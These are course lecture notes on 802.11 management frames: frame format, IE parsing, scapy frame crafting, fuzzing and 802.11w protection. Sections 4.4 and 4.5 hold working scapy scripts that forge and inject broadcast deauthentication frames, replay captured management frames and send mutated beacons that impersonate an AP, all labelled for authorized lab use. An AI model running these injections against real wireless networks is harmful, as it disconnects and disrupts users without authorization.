"The 802.11 management frame is the handshake protocol that runs before authentication. It was not designed with the assumption that an attacker could receive and forge it." — the implicit design assumption whose consequences WIR-101 laboratories demonstrated
Lecture (90 min)
4.1 802.11 Beyond WIR-101: What We Are Opening
WIR-101 Weeks 2-5 covered 802.11 at the wireless-pentest engagement level: monitor mode, airodump-ng, WPA handshake capture, hashcat cracking, PMKID capture, and basic deauthentication. RF-201 opens three things WIR-101 mentioned in passing:
- Replay at the frame level — capturing and retransmitting individual 802.11 frames
- Fuzzing management frames — generating malformed/mutated frames and observing target AP or client behavior
- scapy as the 802.11 frame-crafting tool — programmatic frame construction, manipulation, and injection
4.2 802.11 Frame Types: The Complete Picture
The 802.11 standard defines three frame types. WIR-101 introduced management frames. RF-201 covers all three.
Management frames: Control the association state machine. Neither encrypted nor authenticated unless 802.11w (MFP) is negotiated, regardless of how strong the WPA2/WPA3 data protection is. Observable by any station in monitor mode.
| Subtype | Purpose | Security implication |
|---|---|---|
| Probe Request | Client scans for APs by SSID | Reveals client's preferred network list |
| Probe Response | AP announces itself | Reveals AP capabilities, SSID, supported rates |
| Authentication | Open System or SAE (WPA3) auth exchange | SAE commit/confirm frames visible pre-association |
| Association Request | Client negotiates parameters | Reveals client capabilities |
| Association Response | AP accepts/rejects | |
| Deauthentication | Terminate an association | No authentication required to send; enables deauth attacks |
| Disassociation | Terminate cleanly | Same vulnerability as deauth |
| Beacon | Periodic AP announcement | Default interval 100 TU (about 102 ms); BSSID/SSID/capabilities/IEs in cleartext |
| Action | Vendor-specific; block ACK negotiation; spectrum management | 802.11n Block ACK setup; used in some fingerprinting techniques |
Control frames: Manage channel access and acknowledgement. Part of CSMA/CA.
| Subtype | Purpose |
|---|---|
| RTS / CTS | Request-to-Send / Clear-to-Send for collision avoidance |
| ACK | Acknowledge unicast data/management frames |
| Block ACK | Acknowledge a burst of buffered frames (802.11n+) |
| PS-Poll | Power-save poll; retrieve buffered frames from AP |
Data frames: Carry the actual payload. WPA2/WPA3 encrypts the frame body only; the MAC header (addresses, sequence number, flags) stays in cleartext.
4.3 The 802.11 Frame Format: Dissection
A management frame has this structure:
| FC (2B) | Duration (2B) | Addr1 (6B) | Addr2 (6B) | Addr3 (6B) | Seq Ctrl (2B) | [Body] | FCS (4B) |
Frame Control (FC, 2 bytes, little-endian) encodes Protocol Version (2b), Type (2b), Subtype (4b), then the flag bits To DS, From DS, More Frag, Retry, Power Mgmt, More Data, Protected Frame, Order. The Protected Frame bit tells you whether the frame body is encrypted.
Addresses: The interpretation of Addr1/2/3 depends on the To DS / From DS bits:
- Management frames and ad-hoc data (To DS = From DS = 0): Addr1 = DA (receiver), Addr2 = SA (transmitter), Addr3 = BSSID
- Infrastructure data frames: client to AP (To DS = 1) has Addr1 = BSSID, Addr2 = SA, Addr3 = DA; AP to client (From DS = 1) has Addr1 = DA, Addr2 = BSSID, Addr3 = SA
- WDS (bridge mode, To DS = From DS = 1): a fourth address field (Addr4) follows the Sequence Control field
The BSSID is the AP's MAC address. It is unencrypted in every beacon and management frame. You can derive vendor from OUI (first 3 bytes), model from OUI+model tables, and sometimes firmware version from beacon IEs (Information Elements).
Information Elements (IEs): Variable-length TLV structures in management frames carrying SSID, supported rates, RSN (WPA/WPA2/WPA3 capabilities), HT/VHT/HE capabilities, country, channel, etc. Wireshark decodes IEs in the 802.11 dissector.
FCS: 32-bit CRC (same polynomial as Ethernet) over the MAC header and body, transmitted least-significant byte first. Receivers drop frames with a bad FCS. Injection: the NIC or driver normally computes the FCS itself on transmit; whether an injected frame can carry its own FCS is driver-specific, so do not assume a hand-written FCS survives.
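The layout above, as an added worked example that is not part of the course materials: a pure-Python builder and parser for management frames, with no scapy dependency so every field is visible. It builds a beacon carrying SSID, supported-rates, DS-parameter and RSN IEs (the RSN capabilities field holds the MFPC/MFPR bits that section 4.6 and this week's homework ask you to read), computes and verifies the FCS, builds the deauthentication frame that section 4.4 crafts with scapy, and stops cleanly on a truncated IE. The SSID, BSSID and client addresses are constructed sample values.

```python
import struct
import zlib

# Added example (not course code): build and parse 802.11 management frames in
# pure Python so every field of the frame format is explicit. Field layouts
# follow IEEE 802.11; the SSID/BSSID/client values below are constructed.

TYPE_MGMT = 0
SUBTYPE_BEACON, SUBTYPE_DEAUTH = 8, 12
IE_SSID, IE_RATES, IE_DS_PARAM, IE_RSN = 0, 1, 3, 48
OUI_RSN = b"\x00\x0f\xac"                    # suite selector OUI used by RSN
RSN_CAP_MFPR, RSN_CAP_MFPC = 0x0040, 0x0080  # RSN Capabilities bits 6 and 7
MGMT_HDR_LEN, BEACON_FIXED_LEN = 24, 12     # FC+Dur+3 addrs+SeqCtl; timestamp+interval+cap

def mac(s):
    return bytes.fromhex(s.replace(":", ""))

def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def ie(eid, payload):
    """One TLV Information Element: ID, length, value."""
    return bytes([eid, len(payload)]) + payload

def rsn_ie(akm=2, mfpc=True, mfpr=False):
    """RSN IE: version 1, CCMP group and pairwise cipher, one AKM (2=PSK, 8=SAE), capabilities."""
    caps = (RSN_CAP_MFPC if mfpc else 0) | (RSN_CAP_MFPR if mfpr else 0)
    body = (struct.pack("<H", 1)
            + OUI_RSN + b"\x04"                          # group cipher suite: CCMP-128
            + struct.pack("<H", 1) + OUI_RSN + b"\x04"   # one pairwise suite: CCMP-128
            + struct.pack("<H", 1) + OUI_RSN + bytes([akm])
            + struct.pack("<H", caps))
    return ie(IE_RSN, body)

def build_mgmt(subtype, da, sa, bssid, body, seq=0, flags=0):
    """MAC header + body + FCS. FC byte 0 = version(2b)|type(2b)|subtype(4b); byte 1 = flags."""
    fc = bytes([(TYPE_MGMT << 2) | (subtype << 4), flags])
    hdr = fc + struct.pack("<H", 0) + mac(da) + mac(sa) + mac(bssid) + struct.pack("<H", seq << 4)
    frame = hdr + body
    return frame + struct.pack("<I", zlib.crc32(frame) & 0xFFFFFFFF)   # CRC-32, sent LSB first

def build_beacon(ssid, bssid, channel, akm=2, mfpc=True, mfpr=False, interval_tu=100):
    fixed = struct.pack("<QHH", 0, interval_tu, 0x0411)   # timestamp, interval (TU), cap: ESS|Privacy|ShortSlot
    ies = (ie(IE_SSID, ssid.encode()) + ie(IE_RATES, b"\x82\x84\x8b\x96")
           + ie(IE_DS_PARAM, bytes([channel])) + rsn_ie(akm, mfpc, mfpr))
    return build_mgmt(SUBTYPE_BEACON, "ff:ff:ff:ff:ff:ff", bssid, bssid, fixed + ies)

def build_deauth(client, bssid, reason=7):
    """Deauth as the AP would send it: Addr2 (SA) must be the BSSID or the client ignores it."""
    return build_mgmt(SUBTYPE_DEAUTH, client, bssid, bssid, struct.pack("<H", reason))

def parse_ies(buf):
    """Walk the TLV list; stop cleanly on a truncated element instead of over-reading."""
    out, i = [], 0
    while i + 2 <= len(buf):
        eid, ln = buf[i], buf[i + 1]
        if i + 2 + ln > len(buf):
            break
        out.append((eid, buf[i + 2:i + 2 + ln]))
        i += 2 + ln
    return out

def parse_rsn(payload):
    """Return version, AKM suite types and MFP bits, or None if the IE is malformed."""
    try:
        version, = struct.unpack_from("<H", payload, 0)
        i = 6                                                   # skip group cipher suite
        pc, = struct.unpack_from("<H", payload, i); i += 2 + 4 * pc
        ac, = struct.unpack_from("<H", payload, i); i += 2
        akms = [payload[i + 4 * k + 3] for k in range(ac)]; i += 4 * ac
        caps, = struct.unpack_from("<H", payload, i)
    except (struct.error, IndexError):
        return None
    return {"version": version, "akm": akms,
            "mfpc": bool(caps & RSN_CAP_MFPC), "mfpr": bool(caps & RSN_CAP_MFPR)}

def parse_mgmt(frame):
    """Decode FC, addresses, sequence number, FCS validity and, for beacons, SSID/channel/RSN/MFP."""
    if len(frame) < MGMT_HDR_LEN + 4:
        raise ValueError("shorter than a management header plus FCS")
    body, fcs = frame[:-4], frame[-4:]
    info = {
        "type": (frame[0] >> 2) & 0x3, "subtype": frame[0] >> 4,
        "protected": bool(frame[1] & 0x40),                   # Protected Frame bit
        "addr1": mac_str(frame[4:10]), "addr2": mac_str(frame[10:16]), "addr3": mac_str(frame[16:22]),
        "seq": struct.unpack_from("<H", frame, 22)[0] >> 4,   # upper 12 bits; low 4 = fragment number
        "fcs_ok": struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF) == fcs,
        "mfp": "none",
    }
    if info["type"] == TYPE_MGMT and info["subtype"] == SUBTYPE_BEACON:
        for eid, val in parse_ies(body[MGMT_HDR_LEN + BEACON_FIXED_LEN:]):
            if eid == IE_SSID:
                info["ssid"] = val.decode(errors="replace")
            elif eid == IE_DS_PARAM and val:
                info["channel"] = val[0]
            elif eid == IE_RSN:
                info["rsn"] = parse_rsn(val)
        rsn = info.get("rsn")
        if rsn:
            info["mfp"] = "required" if rsn["mfpr"] else "capable" if rsn["mfpc"] else "none"
    return info

if __name__ == "__main__":
    beacon = build_beacon("lab-net", "02:00:00:aa:bb:cc", 6, akm=8, mfpc=True, mfpr=True)
    print(parse_mgmt(beacon))
    print(parse_mgmt(build_deauth("02:00:00:11:22:33", "02:00:00:aa:bb:cc")))
```

Feed parse_mgmt the bytes of a frame from a monitor-mode capture after stripping the Radiotap header, and it reports the same SSID/channel/MFP triple the homework script prints from scapy; flip any bit in the body and fcs_ok goes False, which is the check a receiver makes before it looks at anything else.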
4.4 scapy 802.11 Layers
scapy is the primary tool for programmatic 802.11 frame crafting. You need monitor mode and a packet-injection-capable NIC (the Alfa AWUS036ACM from WIR-101 works).
from scapy.layers.dot11 import (
    Dot11, Dot11Beacon, Dot11Elt, Dot11Auth, Dot11Deauth,
    Dot11AssoReq, Dot11AssoResp, RadioTap
)
from scapy.sendrecv import sendp, sniff

# Craft a deauthentication frame as the AP would send it to all of its clients
BSSID = "11:22:33:44:55:66"   # target AP
deauth = (
    RadioTap() /
    Dot11(type=0, subtype=12,          # 0 = management, 12 = deauthentication
          addr1="ff:ff:ff:ff:ff:ff",   # broadcast: every associated client
          addr2=BSSID,                 # spoofed source: a client only honours a deauth from its own AP
          addr3=BSSID) /               # BSSID
    Dot11Deauth(reason=7)              # 7 = class 3 frame received from non-associated STA
)

# Send 10 deauth frames, 100 ms apart, on the monitor interface
# AUTHORIZED LAB ENVIRONMENT ONLY
sendp(deauth, iface="wlan0mon", count=10, inter=0.1)
Capture and replay:
from scapy.all import rdpcap, wrpcap, sendp
from scapy.layers.dot11 import Dot11, Dot11Beacon, Dot11Elt

# Load a PCAP captured in WIR-101
frames = rdpcap("wir101-lab2-association.pcap")

# Filter management frames (type 0)
mgmt_frames = [f for f in frames if f.haslayer(Dot11) and f[Dot11].type == 0]
print(f"Management frames: {len(mgmt_frames)}")

# Inspect beacon IEs: walk the Dot11Elt chain to the SSID element (ID 0)
# instead of assuming it is the first IE in the frame
for f in mgmt_frames:
    if f.haslayer(Dot11Beacon):
        elt = f[Dot11Elt]
        while elt is not None and elt.ID != 0:
            elt = elt.payload.getlayer(Dot11Elt)
        if elt is not None:
            print("SSID:", elt.info.decode(errors='replace'))

# Replay: re-inject the captured management frames as-is (RadioTap header included)
# AUTHORIZED LAB ENVIRONMENT ONLY
sendp(mgmt_frames, iface="wlan0mon", inter=0.01)
4.5 Management Frame Fuzzing
What fuzzing 802.11 management frames means: Send malformed, mutated, or edge-case management frames to a target AP or client and observe:
- Does the target crash, reboot, or lock up? (DoS)
- Does the target produce unexpected frames in response? (state machine confusion)
- Does the target associate or deauthenticate unexpectedly? (protocol bugs)
Known vulnerability classes from management-frame fuzzing:
- Deauth flood: Sustained broadcast deauth causes clients to disconnect and prevents reassociation. No fix without 802.11w (Management Frame Protection, MFP).
- SSID buffer overflow (historical): Some 802.11 drivers copied the SSID IE into a fixed 32-byte buffer using the attacker-controlled length byte, without bounds checking, so a beacon or probe response with an oversized SSID crashed the kernel. CVE-based research (pre-2015) found several kernel driver crashes this way.
- Malformed RSN IE: Some APs handle corrupted RSN (WPA2 capabilities) IEs incorrectly, leading to incorrect security negotiation or crash.
- Action frame fuzzing: 802.11 Action frames carry vendor-specific content; parsing bugs have been found in AP firmware.
Fuzzing framework (Python + scapy). Two points before running it: beacons are parsed by clients, not by the AP whose BSSID they carry, so this mutator exercises client drivers (to fuzz an AP, send Probe Request or Association Request frames with addr1 = the AP); and scapy fills the IE length byte from the payload, so this version varies only SSID size and content. To produce length/payload mismatches pass Dot11Elt(len=...) explicitly.
import random
from scapy.layers.dot11 import Dot11, Dot11Elt, Dot11Beacon, RadioTap
from scapy.sendrecv import sendp

def fuzz_beacon(target_bssid, iface="wlan0mon"):
    # Mutate the SSID IE: random length 0-255 (the spec maximum is 32) and random bytes
    ssid_content = bytes(random.randint(0, 255) for _ in range(random.randint(0, 255)))
    beacon = (
        RadioTap() /
        Dot11(type=0, subtype=8,              # 0 = management, 8 = beacon
              addr1="ff:ff:ff:ff:ff:ff",      # broadcast to every listening client
              addr2=target_bssid,             # impersonate the sandboxed AP
              addr3=target_bssid) /
        Dot11Beacon(cap=0x2105) /             # capability info field
        Dot11Elt(ID=0, info=ssid_content) /   # SSID IE; scapy sets len = len(info)
        Dot11Elt(ID=1, info=b"\x82\x84\x8b\x96")  # supported rates: 1/2/5.5/11 Mbps, all basic
    )
    sendp(beacon, iface=iface, count=1, verbose=0)

# Run against the instructor-controlled sandbox only: authorized lab environment
for _ in range(100):
    fuzz_beacon("00:11:22:33:44:55")
Lab 3 applies this against an instructor-controlled sandboxed AP and its test clients. Observe the AP log and client behavior with Wireshark.
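The mutation strategies a management-frame fuzzer actually needs, as an added example that is not part of the course materials: it generates the edge cases that matter for the SSID IE (maximum length, one over, 255 bytes, a length byte that lies in both directions, duplicates, truncation, empty, random bit flips) and runs them against two model parsers, a naive one that trusts the length byte and copies into a 32-byte destination (Python's IndexError stands in for the memory-safety bug of the historical driver class) and a bounds-checked one. The base IE list and the target parsers are constructed for the example; a live run would hand each mutated byte string to scapy as Dot11Beacon(...) / Raw(load=mutated) instead of a Dot11Elt chain.

```python
import random

# Added example (not course code): IE-level mutation strategies for a
# beacon/probe response, plus a naive and a bounds-checked SSID parser as
# model targets. Base IEs are constructed; IndexError models the crash.

SSID_MAX = 32

def ie(eid, payload, length=None):
    """Serialize one IE; `length` lets the length byte disagree with the payload."""
    ln = len(payload) if length is None else length
    return bytes([eid, ln & 0xFF]) + payload

def serialize(ies):
    return b"".join(ie(e, p) for e, p in ies)

# SSID, supported rates, DS parameter (channel 6)
BASE_IES = [(0, b"lab-net"), (1, b"\x82\x84\x8b\x96"), (3, b"\x06")]

def mutations(base, rng):
    """Yield (name, ie_bytes) for each edge case a management-frame parser must survive."""
    ssid = next(p for e, p in base if e == 0)
    rest = [(e, p) for e, p in base if e != 0]
    yield "ssid_max", serialize([(0, b"A" * SSID_MAX)] + rest)
    yield "ssid_over", serialize([(0, b"A" * (SSID_MAX + 1))] + rest)
    yield "ssid_255", serialize([(0, bytes(rng.randrange(256) for _ in range(255)))] + rest)
    yield "len_lies_long", ie(0, ssid, length=200) + serialize(rest)   # claims bytes that are not there
    yield "len_lies_short", ie(0, ssid, length=2) + serialize(rest)    # next IE now "starts" inside the SSID
    yield "ssid_dup", serialize([(0, ssid), (0, b"other")] + rest)
    yield "truncated", serialize(base)[:5]                              # cut mid-SSID
    yield "empty", serialize([(0, b"")] + rest)
    buf = bytearray(serialize(base))
    for _ in range(3):
        buf[rng.randrange(len(buf))] ^= 1 << rng.randrange(8)
    yield "bitflip", bytes(buf)

def naive_ssid(buf):
    """Trusts the length byte and copies that many bytes into a 32-byte destination."""
    i = 0
    while i < len(buf):
        eid, ln = buf[i], buf[i + 1]
        if eid == 0:
            dst = bytearray(SSID_MAX)
            for k in range(ln):
                dst[k] = buf[i + 2 + k]   # write past dst or read past buf raises IndexError here
            return bytes(dst[:ln])
        i += 2 + ln
    return None

def safe_ssid(buf):
    """Bounds-checked: rejects truncated or lying lengths and SSIDs over 32 bytes."""
    i = 0
    while i + 2 <= len(buf):
        eid, ln = buf[i], buf[i + 1]
        end = i + 2 + ln
        if end > len(buf):
            return None
        if eid == 0:
            return buf[i + 2:end] if ln <= SSID_MAX else None
        i = end
    return None

def run_fuzz(parser, seed=1):
    """Map each mutation name to 'ok' or the exception class it raised in `parser`."""
    rng = random.Random(seed)
    results = {}
    for name, frame in mutations(BASE_IES, rng):
        try:
            parser(frame)
            results[name] = "ok"
        except Exception as exc:
            results[name] = type(exc).__name__
    return results

if __name__ == "__main__":
    for p in (naive_ssid, safe_ssid):
        print(p.__name__, run_fuzz(p))
```

The naive parser falls over on ssid_over, ssid_255, len_lies_long and truncated, which is exactly the set a length-trusting copy cannot survive, while len_lies_short returns a wrong but harmless SSID, the kind of silent misparse that only shows up if you also compare the parsed output against what you sent. Over the air the observation step is the same: log which mutation name went out before each injection so a crash or reboot in the target can be matched to the frame that caused it.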
4.6 802.11w (Management Frame Protection)
802.11w (MFP), mandatory in WPA3 and optional in WPA2, extends protection to the robust management frames: deauthentication, disassociation and most Action frames. Unicast robust management frames are encrypted with the pairwise cipher (CCMP or GCMP; TKIP is not permitted with MFP), and broadcast ones carry a BIP message integrity code under a group key (the IGTK). Once both sides have negotiated MFP, a broadcast deauth flood fails because the forgery cannot pass MIC verification.
The catch: MFP is negotiated through the MFPC (capable) and MFPR (required) bits in the RSN Capabilities field of the RSN IE during association. Both AP and client must support it. Legacy clients and APs without 802.11w support cannot use MFP and remain vulnerable to deauth floods; an AP that sets MFPC but not MFPR still accepts non-MFP clients, and those clients stay deauth-floodable even though the AP "supports" 802.11w.
Your tool journal note: airodump-ng shows "MFP: yes/no" in the network scan. An AP advertising WPA2 without MFP remains deauth-floodable regardless of passphrase strength.
Homework
Reading (1.5 hr):
- PySDR Ch 9 (Noise and dB) — review at intermediate depth for SNR intuition
- scapy documentation: Layer 2 (Dot11 classes) — docs.scapy.net
- 802.11w (Management Frame Protection) — WPA3 specification Section 4 overview; free at Wi-Fi Alliance
Hands-on (1.5 hr): Using scapy, write a script that:
- Sniffs 802.11 frames in monitor mode for 30 seconds
- Prints a sorted frequency table of frame subtypes observed (Beacon, Probe Request, etc.)
- For each unique BSSID, prints: SSID, channel, MFP support (the MFPC/MFPR bits in the RSN IE capabilities field)
This is the basis of a passive 802.11 recon tool. Compare the output to what airodump-ng shows for the same environment.
Toolchain Diary Entry
First-introduce this week: scapy 802.11 / Dot11 layer
scapy: Python packet manipulation library. 802.11 support via the scapy.layers.dot11 module. Key classes: RadioTap, Dot11, Dot11Beacon, Dot11Deauth, Dot11Auth, Dot11Elt. Use ls(Dot11) in scapy interactive shell to see all field names. Use hexdump(frame) to see raw bytes. sendp(frame, iface="wlan0mon") injects at Layer 2; requires monitor mode.
Key Terms
- Management frame: 802.11 frame type=0; controls the association state machine; neither encrypted nor authenticated unless 802.11w (MFP) is negotiated
- Information Element (IE): TLV structure in management frames; SSID/rates/RSN/HT/VHT/HE capabilities encoded here
- FCS (Frame Check Sequence): 32-bit CRC appended to 802.11 frames; frames that fail it are dropped by the receiver; in monitor mode some drivers pass bad-FCS frames up flagged in the Radiotap header, others drop them, so check the driver before trusting that you see everything
- 802.11w (MFP): Management Frame Protection; authenticates deauth/disassoc frames; defeats deauth flood when deployed
- Frame injection: transmit crafted 802.11 frames from software; requires monitor-mode-capable NIC and driver support
- Deauth flood: sustained broadcast deauthentication frames; disconnects clients from AP; no defense without 802.11w